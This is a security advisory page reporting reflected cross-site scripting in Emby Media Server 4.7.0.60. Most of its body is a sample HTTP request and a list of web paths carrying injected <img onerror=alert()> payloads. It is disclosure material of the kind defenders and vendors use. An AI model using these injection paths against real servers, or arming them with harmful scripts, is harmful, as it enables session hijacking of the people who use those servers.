Emby Media Server 4.7.0.60 Cross Site Scripting

2022.05.19
Credit: Yehia Elghaly
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Emby Media Server 4.7.0.60 Cross Site Scripting # Google Dork: NA # Date: 18/05/2022 # Exploit Author: Yehia Elghaly # Vendor Homepage: https://emby.media/ # Software Link: https://emby.media/windows-server.html # Version: 4.7.0.60 # Tested on: Windows 7 / 10 Summary: Emby (formerly Media Browser) is a media server designed to organize, play, and stream audio and video to a variety of devices. Emby is open-source, and uses a client-server model. Description: Reflected XSS found on the follwoing paths GET /web/index.htmlwkdlv%3cimg%20src%3da%20onerror%3dalert('xssyf')%3etsz47 HTTP/1.1 Host: 192.168.1.99:8096 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Accept-Encoding: gzip, deflate Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 Connection: close Cache-Control: max-age=0 /web/apploader.jsgavm5%3cimg%20src%3da%20onerror%3dalert(1)%3efekx9?v=4.7.0.60 /web/manifest.jsono32b7%3cimg%20src%3da%20onerror%3dalert(1)%3ebhmxn /web/modules/common/strings/en-GB.jsons0ult%3cimg%20src%3da%20onerror%3dalert(1)%3es9n62?v=4.7.0.60 /web/modulesd3s7a%3cimg%20src%3da%20onerror%3dalert(1)%3ez7ego/common/strings/en-GB.json?v=4.7.0.60 /web/modules/commonat2op%3cimg%20src%3da%20onerror%3dalert(1)%3eobgl7/strings/en-GB.json?v=4.7.0.60 /web/modules/common/stringshh0u9%3cimg%20src%3da%20onerror%3dalert(1)%3et78cc/en-GB.json?v=4.7.0.60 /web/modules/themes/dark/theme.jsonl0ofz%3cimg%20src%3da%20onerror%3dalert(1)%3edltvh?v=4.7.0.60 /web/modulesx4l2h%3cimg%20src%3da%20onerror%3dalert(1)%3emr73x/themes/dark/theme.json?v=4.7.0.60 /web/modules/themesm2gyr%3cimg%20src%3da%20onerror%3dalert(1)%3ek2oyi/dark/theme.json?v=4.7.0.60 /web/modules/themes/darknhu2c%3cimg%20src%3da%20onerror%3dalert(1)%3ez9cpp/theme.json?v=4.7.0.60 /web/startup/login.htmljpi2c%3cimg%20src%3da%20onerror%3dalert(1)%3enwvie?v=4.7.0.60 /web/startupipm82%3cimg%20src%3da%20onerror%3dalert(1)%3ei44hr/login.html?v=4.7.0.60 /web/strings/en-GB.jsonqulu8%3cimg%20src%3da%20onerror%3dalert(1)%3eghzge?v=4.7.0.60 /web/stringsxyvvd%3cimg%20src%3da%20onerror%3dalert(1)%3ewliqe/en-GB.json?v=4.7.0.60


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top